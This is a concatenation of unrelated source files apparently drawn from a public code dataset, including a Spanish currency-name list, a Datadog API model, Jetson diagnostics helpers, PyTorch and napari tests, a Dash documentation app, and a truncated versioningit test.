("BSD", "Dólar bahameño"),
("BTN", "Ngultrum butanés"),
("BWP", "Pula de Botswana"),
("BYR", "Rublio bielurruso"),
("BZD", "Dólar beliceño"),
("CAD", "Dólar canadiense"),
("CDF", "Franco congolés"),
("CHF", "Franco suizo"),
("CLP", "Peso chileno"),
("CNY", "Yuan"),
("COP", "Peso colombiano"),
("CRC", "Colón costarricense"),
("CUC", "Peso cubano convertible"),
("CUP", "Peso subano"),
("CVE", "Escudo de Cabo Verde"),
("CZK", "Corona checa"),
("DJF", "Franco yibutiano"),
("DKK", "Corona danesa"),
("DOP", "Peso dominicano"),
("DZD", "Dinar argelino"),
("EGP", "Libra egipcia"),
("ERN", "Nafka"),
("ETB", "Bir de Etiopía"),
("EUR", "Euro"),
("FJD", "Dólar fiyiano"),
("FKP", "Libra de las islas Falkland"),
("GBP", "Libra esterlina"),
("GEL", "Larí georgiano"),
("GGP", "Libra de Guernsey"),
("GHS", "Cedi"),
("GIP", "Libra de Gibraltar"),
("GMD", "Dalasi"),
("GNF", "Franco guineano"),
("GTQ", "Quetzal guatemalteco"),
("GYD", "Dólar guyanés"),
("HKD", "Dólar hongkonés"),
("HNL", "Lempira hondureño"),
("HRK", "Kuna croata"),
("HTG", "Gourde haitiano"),
("HUF", "Forinto húngaro"),
("IDR", "Rupia indonesia"),
("ILS", "Séquel israelí"),
("NIS", "Nuevo Séquel israelí"),
("IMP", "Libra manesa"),
("INR", "Rupia india"),
("IQD", "<NAME>"),
("IRR", "Rial iraní"),
("ISK", "Corona islandesa"),
("JEP", "Libra de Jersey"),
("JMD", "Dólar jamaicano"),
("JOD", "Dinar jordano"),
("JPY", "Yen japonés"),
("KES", "<NAME>"),
("KGS", "Som kirguís"),
("KHR", "<NAME>"),
("KMF", "Franco comorense"),
("KPW", "Won norcoreano"),
("KRW", "Krahn Occidental"),
("KWD", "Dinar kuwaití"),
("KYD", "D<NAME>"),
("KZT", "<NAME>"),
("LAK", "<NAME>"),
("LBP", "Libra libanesa"),
("LKR", "Rupia esrilanquesa"),
("LRD", "<NAME>"),
("LSL", "<NAME>"),
("LTL", "Litas lituana"),
("LYD", "<NAME>"),
("MAD", "<NAME>"),
("MDL", "<NAME>"),
("MGA", "<NAME>"),
("MKD", "<NAME>"),
("MMK", "<NAME>"),
("MNT", "<NAME>"),
("MOP", "<NAME>"),
("MRO", "<NAME>"),
("MUR", "R<NAME>"),
("MVR", "Rupia de Maldivas"),
("MWK", "<NAME>"),
("MXN", "Peso mexicano"),
("MYR", "Ringgit"),
("MZN", "Metical mozambiqueño"),
("NAD", "<NAME>"),
("NGN", "Naira nigeriano"),
("NIO", "Córdoba nicaragüense"),
("NOK", "Corona noruega"),
("NPR", "Rupia nepalí"),
("NZD", "<NAME>"),
("OMR", "R<NAME>"),
("PAB", "Balboa panameño"),
("PEN", "Sol peruano"),
("PGK", "Kina"),
("PHP", "Peso filipino"),
("PKR", "Rupia pakistaní"),
("PLN", "Złoty polaco"),
("PYG", "Guaraní paraguayo"),
("QAR", "Riyal catarí"),
("RON", "<NAME>"),
("RSD", "<NAME>"),
("RUB", "Rublo ruso"),
("RWF", "Franco ruandés"),
("SAR", "Riyal saudí"),
("SBD", "Dólar de las islas Solomon"),
("SCR", "Rupia seychellense"),
("SDG", "Libra sudanesa"),
("SEK", "Corona sueca"),
("SGD", "Dólar de Singapur"),
("SHP", "Libra de Santa Elena"),
("SLL", "Leona"),
("SOS", "Chelín somalí"),
("SPL", "Luigino"),
("SRD", "Dólar surinamés"),
("STD", "Dobra santotomense"),
("SVC", "Colón salvadoreño"),
("SYP", "Libra siria"),
("SZL", "Lilangeni"),
("THB", "Baht tailandés"),
("TJS", "Somoni tayiko"),
("TMT", "Manat turcomano"),
("TND", "Dinar tunecino"),
("TOP", "Pa'anga tongano"),
("TRY", "Lira turca"),
("TTD", "Dólar de Trinidad and Tobago"),
("TVD", "Dólar tuvaluano"),
("TWD", "Nuevo dólar taiwanés"),
("TZS", "Chelín tanzano"),
("UAH", "Grivna ucraniano"),
("UGX", "Chelín ugandés"),
("USD", "Dólar de Estados Unidos"),
("UYU", "Peso uruguayo"),
("UZS", "Soʻm Uzbekistani"),
("VEF", "Bolívar venezolano"),
("VND", "Đồng vietnamita"),
("VUV", "Vanuatu vatu"),
("WST", "Tālā samoano"),
("XAF", "Franco centro africano"),
("XCD", "Dólar del Caribe Oriental"),
("XDR", "Derechos especiales de giro"),
("XOF", "Franco de África occidental"),
("XPF", "Franco CFP"),
("YER", "Rial yemení"),
("ZAR", "<NAME>"),
("ZMW", "<NAME>"),
("ZWD", "<NAME>"),
)
|
StarcoderdataPython
|
8151329
|
from torch.nn import L1Loss
from hyperverlet.loss import TimeDecayMSELoss, MeanNormLoss
def construct_loss(train_args):
criterion = train_args['criterion']
if criterion == 'TimeDecayMSELoss':
time_decay = train_args["time_decay"]
return TimeDecayMSELoss(time_decay)
else:
losses = {
'MeanNormLoss': MeanNormLoss,
'L1Loss': L1Loss
}
return losses[criterion]()
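# Usage sketch (hypothetical train_args dicts; only the keys read above are shown):
#   criterion = construct_loss({'criterion': 'TimeDecayMSELoss', 'time_decay': 0.99})
#   criterion = construct_loss({'criterion': 'L1Loss'})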
|
StarcoderdataPython
|
6632004
|
<reponame>Valisback/hiring-engineers<gh_stars>0
# Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
from datadog_api_client.v1.model_utils import (
ModelNormal,
cached_property,
)
def lazy_import():
from datadog_api_client.v1.model.group_widget_definition_type import GroupWidgetDefinitionType
from datadog_api_client.v1.model.widget import Widget
from datadog_api_client.v1.model.widget_layout_type import WidgetLayoutType
from datadog_api_client.v1.model.widget_text_align import WidgetTextAlign
globals()["GroupWidgetDefinitionType"] = GroupWidgetDefinitionType
globals()["Widget"] = Widget
globals()["WidgetLayoutType"] = WidgetLayoutType
globals()["WidgetTextAlign"] = WidgetTextAlign
class GroupWidgetDefinition(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
validations = {}
@cached_property
def openapi_types():
lazy_import()
return {
"background_color": (str,),
"banner_img": (str,),
"layout_type": (WidgetLayoutType,),
"show_title": (bool,),
"title": (str,),
"title_align": (WidgetTextAlign,),
"type": (GroupWidgetDefinitionType,),
"widgets": ([Widget],),
}
attribute_map = {
"layout_type": "layout_type",
"type": "type",
"widgets": "widgets",
"background_color": "background_color",
"banner_img": "banner_img",
"show_title": "show_title",
"title": "title",
"title_align": "title_align",
}
read_only_vars = {}
def __init__(self, layout_type, type, widgets, *args, **kwargs):
"""GroupWidgetDefinition - a model defined in OpenAPI
Args:
layout_type (WidgetLayoutType):
type (GroupWidgetDefinitionType):
widgets ([Widget]): List of widget groups.
Keyword Args:
background_color (str): [optional] Background color of the group title.
banner_img (str): [optional] URL of image to display as a banner for the group.
show_title (bool): [optional] Whether to show the title or not. If omitted the server will use the default value of True.
title (str): [optional] Title of the widget.
title_align (WidgetTextAlign): [optional]
"""
super().__init__(kwargs)
self._check_pos_args(args)
self.layout_type = layout_type
self.type = type
self.widgets = widgets
@classmethod
def _from_openapi_data(cls, layout_type, type, widgets, *args, **kwargs):
"""Helper creating a new instance from a response."""
self = super(GroupWidgetDefinition, cls)._from_openapi_data(kwargs)
self._check_pos_args(args)
self.layout_type = layout_type
self.type = type
self.widgets = widgets
return self
|
StarcoderdataPython
|
9666753
|
<filename>src/utils.py<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (C) 2020, <NAME> <<EMAIL>>
# All rights reserved
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from diagnostic_msgs.msg import DiagnosticStatus, KeyValue
level_options = {
60: DiagnosticStatus.ERROR,
40: DiagnosticStatus.WARN,
20: DiagnosticStatus.OK,
}
def strfdelta(tdelta, fmt):
""" Print delta time
- https://stackoverflow.com/questions/8906926/formatting-python-timedelta-objects
"""
d = {"days": tdelta.days}
d["hours"], rem = divmod(tdelta.seconds, 3600)
d["minutes"], d["seconds"] = divmod(rem, 60)
return fmt.format(**d)
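# Worked example:
#   strfdelta(timedelta(hours=26, minutes=5), "{days}d {hours}h {minutes}m {seconds}s")
# returns "1d 2h 5m 0s".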
def board_status(hardware, board, dgtype):
"""
Board information and libraries installed
"""
values = []
for key, value in board['board'].items():
values += [KeyValue(key, "{value}".format(value=value))]
for key, value in board['libraries'].items():
values += [KeyValue("lib " + key, "{value}".format(value=value))]
# Make board diagnostic status
d_board = DiagnosticStatus(name='jetson_stats {type} config'.format(type=dgtype),
message='Jetpack {jetpack}'.format(jetpack=board['board']['Jetpack']),
hardware_id=hardware,
values=values)
return d_board
def disk_status(hardware, disk, dgtype):
"""
Status disk
"""
value=int(float(disk['used']) / float(disk['total']) * 100.0)
if value >= 90:
level = DiagnosticStatus.ERROR
elif value >= 70:
level = DiagnosticStatus.WARN
else:
level = DiagnosticStatus.OK
# Make board diagnostic status
d_board = DiagnosticStatus(level=level,
name='jetson_stats {type} disk'.format(type=dgtype),
message="{0:2.1f}GB/{1:2.1f}GB".format(disk['used'], disk['total']),
hardware_id=hardware,
values=[
KeyValue("Used", "{used:2.1f}GB".format(used=disk['used'])),
KeyValue("Total", "{total:2.1f}GB".format(total=disk['total'])),
])
return d_board
def cpu_status(hardware, cpu):
"""
Decode a cpu stats
Fields:
- 'status': 'ON'
- 'frq': 204
- 'name': 'CPU1'
- 'val': 8
- 'governor': 'schedutil'
"""
val = cpu['val']
status = cpu['status']
    # Make Diagnostic Status message with cpu info
d_cpu = DiagnosticStatus(name='jetson_stats cpu {name}'.format(name=cpu['name']),
message='{status} - {val}%'.format(val=val, status=status),
hardware_id=hardware,
values=[KeyValue("Status", "{status}".format(status=cpu['status'])),
KeyValue("Governor", "{governor}".format(governor=cpu['governor'])),
KeyValue("Val", "{val}%".format(val=val)),
KeyValue("Freq", "{frq}Mhz".format(frq=cpu['frq'])),
])
return d_cpu
def gpu_status(hardware, gpu):
"""
Decode and build a diagnostic status message
Fields:
- 'val': 10
"""
d_gpu = DiagnosticStatus(name='jetson_stats gpu',
message='{val}%'.format(val=gpu['val']),
hardware_id=hardware,
values=[KeyValue('Val', '{val}%'.format(val=gpu['val']))])
return d_gpu
def fan_status(hardware, fan, dgtype):
"""
Fan speed and type of control
Fields:
- 'status': 'ON'
- 'ctrl': True
- 'cap': 255
- 'tpwm': 0
- 'step': 100
- 'cpwm': 0
"""
if 'cpwm' in fan:
if 'ctrl' in fan:
ctrl = "Ta" if fan.get("ctrl", False) else "Tm"
else:
ctrl = "T"
label = "{ctrl}={target: >3}%".format(ctrl=ctrl, target=fan.get("tpwm", 0))
value = fan.get('cpwm', 0)
else:
label = ''
value = fan.get('tpwm', 0)
# Make fan diagnostic status
d_fan = DiagnosticStatus(name='jetson_stats {type} fan'.format(type=dgtype),
message='speed={speed}% {label}'.format(speed=value, label=label),
hardware_id=hardware,
values=[KeyValue("Status", "{status}".format(status=fan['status'])),
KeyValue("Temp control", "{ctrl}".format(ctrl=fan['ctrl'])),
KeyValue("Capacity", "{cap}%".format(cap=fan['cap'])),
])
return d_fan
def ram_status(hardware, ram, dgtype):
"""
Make a RAM diagnostic status message
Fields:
- 'use': 1325
- 'unit': 'M'
- 'tot': 3964
- 'lfb':
- 'nblock': 411
- 'unit': 'M'
- 'size': 4
"""
lfb_status = ram['lfb']
# value = int(ram['use'] / float(ram['tot']) * 100.0)
unit_name = 'G' # TODO improve with check unit status
# Make ram diagnostic status
d_ram = DiagnosticStatus(name='jetson_stats {type} ram'.format(type=dgtype),
message='{use:2.1f}{unit_ram}/{tot:2.1f}{unit_ram}B (lfb {nblock}x{size}{unit}B)'.format(
use=ram['use'] / 1000.0,
unit_ram=unit_name,
tot=ram['tot'] / 1000.0,
nblock=lfb_status['nblock'],
size=lfb_status['size'],
unit=lfb_status['unit']),
hardware_id=hardware,
values=[KeyValue("Use", "{use:2.1f}{unit}B".format(use=ram['use'] / 1000.0, unit=unit_name)),
KeyValue("Total", "{tot:2.1f}{unit}B".format(tot=ram['tot'] / 1000.0, unit=unit_name)),
KeyValue("lfb", "{nblock}x{size}{unit}B".format(nblock=lfb_status['nblock'],
size=lfb_status['size'],
unit=lfb_status['unit'])),
])
return d_ram
def swap_status(hardware, swap, dgtype):
"""
Make a swap diagnostic message
Fields:
- 'use': 0
- 'unit': 'M'
- 'tot': 1982
- 'cached':
- 'unit': 'M'
- 'size': 0
"""
swap_cached = swap.get('cached', {})
    # Default to the reported unit; converted below when the total is large
    unit = swap.get('unit', '')
    divider = 1.0
if swap.get('tot', 0) > 1000:
if 'k' == swap['unit']:
unit = 'M'
elif 'M' == swap['unit']:
unit = 'G'
divider = 1000.0
# Make swap diagnostic status
d_swap = DiagnosticStatus(name='jetson_stats {type} swap'.format(type=dgtype),
message='{use}{unit}B/{tot}{unit}B (cached {size}{unit}B)'.format(
use=swap.get('use', 0) / divider,
tot=swap.get('tot', 0) / divider,
size=swap_cached.get('size', '0'),
unit=swap_cached.get('unit', '')),
hardware_id=hardware,
values=[KeyValue("Use", "{use:2.1f}{unit}B".format(use=swap['use'] / divider, unit=unit)),
KeyValue("Total", "{tot:2.1f}{unit}B".format(tot=swap['tot'] / divider, unit=unit)),
KeyValue("Cached", "{size}{unit}B".format(size=swap_cached.get('size', '0'),
unit=swap_cached.get('unit', ''))),
])
return d_swap
def power_status(hardware, power):
"""
Make a Power diagnostic message
Fields:
- 'POM_5V_CPU': {'avg': 712, 'cur': 212}
- 'POM_5V_IN': {'avg': 1891, 'cur': 1271}
- 'POM_5V_GPU': {'avg': 31, 'cur': 0}}
"""
values = []
tot = {'cur': 0, 'avg': 0}
for key, value in power.items():
values += [KeyValue(key, "curr={curr}mW avg={avg}mW".format(curr=int(value['cur']), avg=int(value['avg'])))]
tot['cur'] += value['cur']
tot['avg'] += value['avg']
# Make voltage diagnostic status
d_volt = DiagnosticStatus(name='jetson_stats power',
message='curr={curr}mW avg={avg}mW'.format(curr=int(tot['cur']), avg=int(tot['avg'])),
hardware_id=hardware,
values=values)
return d_volt
def temp_status(hardware, temp):
"""
Make a temperature diagnostic message
Fields:
- 'AO': 40.0
- 'PMIC': 100.0
- 'iwlwifi': 36.0
- 'thermal': 31.0
- 'GPU': 31.0
- 'PLL': 28.5
- 'CPU': 31.0
"""
values = []
level = DiagnosticStatus.OK
list_options = sorted(level_options.keys(), reverse=True)
max_temp = 0
for key, value in temp.items():
values += [KeyValue(key, "{value:8.2f}C".format(value=value))]
if key != "PMIC":
max_temp = value if value > max_temp else max_temp
# Make status message
for k in list_options:
if max_temp >= k:
level = level_options[k]
break
# Make temperature diagnostic status
d_temp = DiagnosticStatus(level=level,
name='jetson_stats temp',
message='{n_temp} temperatures reads'.format(n_temp=len(temp)),
hardware_id=hardware,
values=values)
return d_temp
def emc_status(hardware, emc, dgtype):
"""
Make a EMC diagnostic message
Fields:
- 'val': 0
"""
# Make EMC diagnostic status
d_emc = DiagnosticStatus(name='jetson_stats {type} emc'.format(type=dgtype),
message='{val}%'.format(val=emc['val']),
hardware_id=hardware)
return d_emc
# EOF
|
StarcoderdataPython
|
24282
|
<filename>torch_glow/tests/nodes/quantized_batchnorm3d_relu_test.py<gh_stars>1-10
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
import torch.nn as nn
from tests.utils import jitVsGlow
from torch.quantization import (
DeQuantStub,
QConfig,
QuantStub,
convert,
fuse_modules,
observer,
prepare,
)
my_qconfig = QConfig(
activation=observer.default_observer,
weight=observer.HistogramObserver.with_args(dtype=torch.qint8, reduce_range=False),
)
class TestQuantizedBatchNorm3DRelu(unittest.TestCase):
def test_batchnorm_relu_basic(self):
"""
Basic test of the PyTorch 3D batchnorm RELU Node on Glow.
"""
class SimpleQuantizedBatchNormRelu(nn.Module):
def __init__(self, w, b, m, v):
super(SimpleQuantizedBatchNormRelu, self).__init__()
self.bn = torch.nn.BatchNorm3d(4)
self.relu = torch.nn.ReLU()
self.bn.weight = torch.nn.Parameter(w)
self.bn.bias = torch.nn.Parameter(b)
self.bn.running_mean = m
self.bn.running_var = v
self.q = QuantStub()
self.dq = DeQuantStub()
def forward(self, x):
qx = self.q(x)
qy = self.bn(qx)
qy_relu = self.relu(qy)
y = self.dq(qy_relu)
return y
C = 4
weight = torch.ones(C) + torch.rand(C) * 0.001
bias = torch.rand(C) * 0.0001
running_mean = torch.zeros(C)
running_var = torch.ones(C)
inputs = torch.randn((10, C, 2, 3, 4), requires_grad=False)
model = SimpleQuantizedBatchNormRelu(weight, bias, running_mean, running_var)
model.eval()
model.qconfig = my_qconfig
modules_to_fuse = [["bn", "relu"]]
fuse_modules(model, modules_to_fuse, inplace=True)
prepare(model, inplace=True)
model.forward(inputs)
convert(model, inplace=True)
        # Because of differences in quantization between PyTorch & Glow,
        # we set eps big enough.
# Batchnorm introduced great accuracy issues, which could create up to
# ~1e-2 difference in some rare cases. In order to prevent this test
# to be flaky, atol is set to be 0.1.
jitVsGlow(
model,
inputs,
expected_fused_ops={"quantized::batch_norm3d_relu"},
atol=1e-1,
use_fp16=True,
)
|
StarcoderdataPython
|
137505
|
from django.contrib import admin
from .models import Category, Post
admin.site.register(Post)
admin.site.register(Category)
|
StarcoderdataPython
|
12803561
|
from collections import OrderedDict
import dash_html_components as html
import dash_core_components as dcc
import dash_table
from dash.dependencies import Input, Output
from server import app, server
from tutorial import chapter_index
from tutorial import home
def create_contents(contents):
h = []
for i in contents:
if isinstance(i, list):
h.append(create_contents(i))
else:
h.append(html.Li(i))
return html.Ul(h)
chapters = {
'index': {
'url': '/',
'content': home.layout,
'name': 'Index',
'description': ''
}
}
chapters.update(chapter_index.chapters)
sections_ordered = OrderedDict()
sections_ordered['What\'s Dash?'] = [
'introduction',
'gallery'
]
sections_ordered['Dash Tutorial'] = [
'installation',
'getting-started',
'getting-started-part-2',
'state',
'graphing',
'shared-state',
'faqs'
]
sections_ordered['Component Libraries'] = [
'dash-core-components',
'dash-html-components',
'datatable',
'dashdaq'
]
sections_ordered['Creating Your Own Components'] = [
'react-for-python-developers',
'plugins',
'd3-plugins'
]
sections_ordered['Beyond the Basics'] = [
'performance',
'live-updates',
'external',
'urls',
'devtools'
]
sections_ordered['Production'] = [
'auth',
'deployment'
]
sections_ordered['Getting Help'] = [
# TODO add in the dash community forum
'support'
]
sections_ordered['Component Examples'] = [
'dropdown-examples',
'slider-examples',
'range-slider-examples',
'checklist-examples',
'input-examples',
'radio-item-examples',
'button-examples',
'datepickersingle-examples',
'datepickerrange-examples',
'markdown-examples',
'link-examples',
'tabs-example',
'textarea-examples',
'upload-examples',
'booleanswitch-examples',
'colorpicker-examples',
'gauge-examples',
'graduatedbar-examples',
'indicator-examples',
'knob-examples',
'leddisplay-examples',
'numericinput-examples',
'powerbutton-examples',
'precisioninput-examples',
'stopbutton-examples',
'slider-examples',
'tank-examples',
'thermometer-examples',
'toggleswitch-examples',
'darkthemeprovider-examples'
]
header = html.Div(
className='header',
children=html.Div(
className='container-width',
style={'height': '100%'},
children=[
html.A(html.Img(
src='https://cdn.rawgit.com/plotly/dash-docs/b1178b4e/images/dash-logo-stripe.svg',
className='logo'
), href='https://plot.ly/products/dash', className='logo-link'),
html.Div(className='links', children=[
html.A('pricing', className='link', href='https://plot.ly/dash/pricing'),
html.A('user guide', className='link active', href='/'),
html.A('plotly', className='link', href='https://plot.ly/'),
html.A(children=[html.I(className="fa fa-search")], className='link', href='/search')
])
]
)
)
app.title = 'Dash User Guide and Documentation - Dash by Plotly'
app.layout = html.Div(
[
# Stores used by examples.
dcc.Store(id='memory'),
dcc.Store(id='memory-output'),
dcc.Store(id='local', storage_type='local'),
dcc.Store(id='session', storage_type='session'),
header,
html.Div([
html.Div(id='wait-for-layout'),
html.Div([
html.Div(
html.Div(id='chapter', className='content'),
className='content-container'
),
], className='container-width')
], className='background'),
dcc.Location(id='location', refresh=False),
]
)
@app.callback(Output('chapter', 'children'),
[Input('location', 'pathname')])
def display_content(pathname):
if pathname is None:
return ''
if pathname.endswith('/') and pathname != '/':
pathname = pathname[:len(pathname) - 1]
if pathname.split('/')[-1] == 'all':
pdf_contents = []
table_of_contents = []
for section in sections_ordered.keys():
section_content = []
section_toc = []
section_id = section.replace(
' ', '-').replace(
'\'', '').replace(
'?', '').lower()
section_content.append(
html.H1(section, className='pdf-docs-section-name')
)
for chapter in sections_ordered[section]:
section_content.append(html.Div(
chapters[chapter]['content'],
className='pdf-docs-chapter',
id=chapter
))
section_toc.append(
html.A(chapter.replace('-', ' ').title(),
href='#{}'.format(chapter))
)
pdf_contents.append(html.Div(
section_content,
className='pdf-docs-section',
id=section_id
))
# add main section to table of contents
table_of_contents.append(
html.A(section,
href='#{}'.format(section_id),
className='toc-section-link')
)
# add all subsections
table_of_contents.append(
html.Div(section_toc,
className='toc-chapter-links')
)
# insert table of contents
return html.Div([
html.Div("Dash User Guide and Documentation",
id='pdf-docs-title'),
html.Div([html.H1('Table of Contents')] + table_of_contents,
id='pdf-docs-toc'),
html.Div(pdf_contents)
], id='pdf-docs')
matched = [c for c in chapters.keys()
if chapters[c]['url'] == pathname]
if matched and matched[0] != 'index':
if 'dash-deployment-server/' in pathname:
content = html.Div([
html.Div(chapters[matched[0]]['content']),
html.Hr(),
dcc.Link(html.A('Back to Dash Deployment Server Documentation'), href='/dash-deployment-server'),
html.Div(id='wait-for-page-{}'.format(pathname)),
])
elif 'datatable/' in pathname:
content = html.Div([
html.Div(chapters[matched[0]]['content']),
html.Hr(),
dcc.Link(
'Back to DataTable Documentation',
href='/datatable'
),
html.Br(),
dcc.Link(
'Back to Dash Documentation',
href='/'
),
html.Div(id='wait-for-page-{}'.format(pathname)),
])
elif 'cytoscape/' in pathname:
content = html.Div([
html.Div(chapters[matched[0]]['content']),
html.Hr(),
dcc.Link(
'Back to Cytoscape Documentation',
href='/cytoscape'
),
html.Br(),
dcc.Link(
'Back to Dash Documentation',
href='/'
),
html.Div(id='wait-for-page-{}'.format(pathname)),
])
else:
content = html.Div([
html.Div(chapters[matched[0]]['content']),
html.Hr(),
dcc.Link(html.A('Back to the Table of Contents'), href='/'),
html.Div(id='wait-for-page-{}'.format(pathname)),
])
else:
content = chapters['index']['content']
return content
app.index_string = '''
<!DOCTYPE html>
<html>
<head>
{%metas%}
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta
name="description"
content="Dash User Guide and Documentation. Dash is a Python framework for building analytical web apps in Python."
>
<title>{%title%}</title>
{%favicon%}
{%css%}
<!-- Google Tag Manager Tag -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-N6T2RXG');</script>
</head>
<body>
<!-- Google Tag Manager Tag -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-N6T2RXG"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
{%app_entry%}
<footer>
{%config%}
{%scripts%}
</footer>
</body>
</html>
'''
if __name__ == '__main__':
app.run_server(debug=True, threaded=True, port=8060)
|
StarcoderdataPython
|
8143204
|
import numpy as np
def test_big_2D_image(viewer_factory):
"""Test big 2D image with axis exceeding max texture size."""
view, viewer = viewer_factory()
shape = (20_000, 10)
data = np.random.random(shape)
layer = viewer.add_image(data, is_pyramid=False)
visual = view.layer_to_visual[layer]
assert visual.node is not None
if visual.MAX_TEXTURE_SIZE_2D is not None:
ds = np.ceil(np.divide(shape, visual.MAX_TEXTURE_SIZE_2D)).astype(int)
assert np.all(layer._transform_view.scale == ds)
def test_big_3D_image(viewer_factory):
"""Test big 3D image with axis exceeding max texture size."""
view, viewer = viewer_factory(ndisplay=3)
shape = (5, 10, 3_000)
data = np.random.random(shape)
layer = viewer.add_image(data, is_pyramid=False)
visual = view.layer_to_visual[layer]
assert visual.node is not None
if visual.MAX_TEXTURE_SIZE_3D is not None:
ds = np.ceil(np.divide(shape, visual.MAX_TEXTURE_SIZE_3D)).astype(int)
assert np.all(layer._transform_view.scale == ds)
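# Illustrative helper showing the downscale factor the assertions above expect.
# The default limit below is a hypothetical value (16384 is a common GL texture
# maximum); the real limit is whatever the visual reports via
# MAX_TEXTURE_SIZE_2D / MAX_TEXTURE_SIZE_3D at runtime.
def _expected_downscale(shape, max_texture_size=16_384):
    """Per-axis integer factor by which an oversized image would be downsampled."""
    return np.ceil(np.divide(shape, max_texture_size)).astype(int)
# e.g. _expected_downscale((20_000, 10)) -> array([2, 1])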
|
StarcoderdataPython
|
1840179
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
def is_only_numeric(s, *args, **kwargs):
"""
True if string `s` contains nothing but numbers (and whitespace)
>>> is_only_numeric('Hi there')
False
>>> is_only_numeric('Number 9')
False
>>> is_only_numeric('42')
True
>>> is_only_numeric(' 4 3 2 1')
True
"""
non_nums_or_spaces = re.sub(r'[\d\s]', '', s)
return len(non_nums_or_spaces) == 0
def is_only_whitespace(s, *args, **kwargs):
"""
    True if string `s` contains nothing but spaces and tabs.
>>> is_only_whitespace('Hi there')
False
>>> is_only_whitespace('42')
False
>>> is_only_whitespace(' 7 ')
False
>>> is_only_whitespace(' ')
True
>>> is_only_whitespace(' ')
True
"""
for c in s:
if c not in (' ', '\t'):
return False
return True
def is_mixed_case(s):
"""
>>> is_mixed_case('HiThere')
True
>>> is_mixed_case('Hi There')
True
>>> is_mixed_case('hi there')
False
>>> is_mixed_case('h')
False
>>> is_mixed_case('H')
False
>>> is_mixed_case(None)
False
"""
if not isinstance(s, (str,)):
return False
mo_lo = re.search(r'[a-z]', s)
mo_hi = re.search(r'[A-Z]', s)
if ((mo_lo is None) or (mo_hi is None)):
return False
return True
def is_ip_address(s):
"""
>>> is_ip_address(None)
False
>>> is_ip_address('192.168.1.7')
True
>>> is_ip_address('192.168.1.7:1221')
False
>>> is_ip_address('192168.1.7')
False
>>> is_ip_address('foo')
False
"""
if s is None:
return False
pattern = r'\d+\.\d+\.\d+\.\d+'
mo = re.match(pattern, s)
if mo is None:
return False
if mo.group(0) == s:
return True
return False
## ---------------------
if __name__ == "__main__":
import doctest
print("[is.py] Testing...")
doctest.testmod()
print("Done.")
|
StarcoderdataPython
|
4826567
|
<filename>test/test_format.py
from datetime import datetime, timezone
from typing import Any, Dict
import pytest
from versioningit.basics import basic_format
from versioningit.core import VCSDescription
from versioningit.errors import ConfigError
BUILD_DATE = datetime(2038, 1, 19, 3, 14, 7, tzinfo=timezone.utc)
@pytest.mark.parametrize(
"description,version,next_version,params,r",
[
(
VCSDescription(
tag="v0.1.0",
state="distance",
branch="main",
fields={
"distance": 5,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
"0.1.0",
"0.2.0",
{},
"0.1.0.post5+gabcdef0",
),
(
VCSDescription(
tag="v0.1.0",
state="dirty",
branch="main",
fields={
"distance": 0,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
"0.1.0",
"0.2.0",
{},
"0.1.0+d20380119",
),
(
VCSDescription(
tag="v0.1.0",
state="distance-dirty",
branch="main",
fields={
"distance": 5,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
"0.1.0",
"0.2.0",
{},
"0.1.0.post5+gabcdef0.d20380119",
),
(
VCSDescription(
tag="v0.1.0",
state="distance",
branch="main",
fields={
"distance": 5,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
"0.1.0",
"0.2.0",
{"distance": "{next_version}.dev{distance}+{vcs}{rev}"},
"0.2.0.dev5+gabcdef0",
),
(
VCSDescription(
tag="v0.1.0",
state="distance",
branch="feature/acme",
fields={
"distance": 5,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
"0.1.0",
"0.2.0",
{"distance": "{next_version}+{branch}.{rev}"},
"0.2.0+feature.acme.abcdef0",
),
(
VCSDescription(
tag="v0.1.0",
state="distance",
branch=None,
fields={
